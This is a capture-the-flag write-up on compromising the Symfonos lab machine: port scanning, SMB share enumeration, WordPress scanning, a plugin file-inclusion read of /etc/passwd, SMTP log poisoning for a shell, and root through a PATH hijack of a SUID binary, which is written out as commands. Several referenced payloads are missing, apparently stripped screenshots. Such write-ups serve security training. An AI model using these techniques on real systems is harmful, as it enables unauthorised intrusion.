Scanning the box with nmap -A -T4 -p- 192.168.1.11 –vv

The host is running smb service that we can scan and list the shares:

So we got a file named attention.txt:

We can now login using helios username and one of these passwords which will be qwerty (after testing each one):

Let’s download these two files research.txt and todo.txt:


The new path /h3l105 is a WordPress site and also change the hosts file to symfonos.local

wpscan –url http://192.168.1.11/h3l105/ -e p:

It says that the upload directory is listing enabled so we check it out and found 3 sub directories:

So i googled it and i found an exploit for it:

And the exploit is LFI command that we use to display the /etc/passwd file:

Ok at this point , back when i was doing enumeration the port 25 is poen and had now use till now, we can use SMTP log poison method:

Then we put this line in the address:
And we get something like this:

Now to get a shell we put this command:

Let’s use “find” to find SUID files: find / -perm -u=s -type f 2>/dev/null

There is a file /opt/statuscheck where we can abuse using path abuse:

cd /tmp
echo “/bin/sh” > curl
chmod 777 curl
echo path
export PATH=/tmp:/$PATH
/opt/statuscheck
